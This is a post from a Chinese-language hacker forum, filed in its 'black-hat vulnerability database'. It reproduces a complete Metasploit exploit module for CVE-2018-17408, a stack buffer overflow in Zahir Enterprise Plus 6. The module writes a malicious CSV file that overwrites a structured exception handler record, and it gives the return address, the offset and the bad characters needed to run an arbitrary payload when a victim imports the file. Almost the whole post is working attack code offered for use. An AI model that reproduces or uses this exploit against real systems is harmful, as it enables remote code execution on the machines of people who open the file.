跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
      'Description'    => %q{
       This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
       via Import from other File. This results in overwriting a structured exception handler record.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'f3ci',       # initial discovery
          'modpr0be'    # poc and Metasploit Module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-17408' ],
          [ 'EDB', '45505' ]
        ],
      'Platform'        => 'win',
      'Targets'         =>
        [
          ['Zahir Enterprise Plus 6 <= build 10b',
            {
              #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
              'Ret'     => 0x52016661,
              'Offset'  => 3041
            }
          ]
        ],
      'Payload'         =>
        {
          'Space'       => 5000,
          'BadChars'    => "\x00\x0a\x0d\x22\x2c",
          'DisableNops'     => true
        },
      'DisclosureDate'  => 'Sep 28 2018',
      'DefaultTarget'   => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
    ])
  end

  def exploit
    buf = rand_text_alpha_upper(target['Offset'])
    buf << "\r\n"   # crash chars
    buf << rand_text_alpha_upper(380) # extra chars to hit the offset
    buf << generate_seh_record(target.ret)
    buf << payload.encoded

    file_create(buf)
  end
end

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。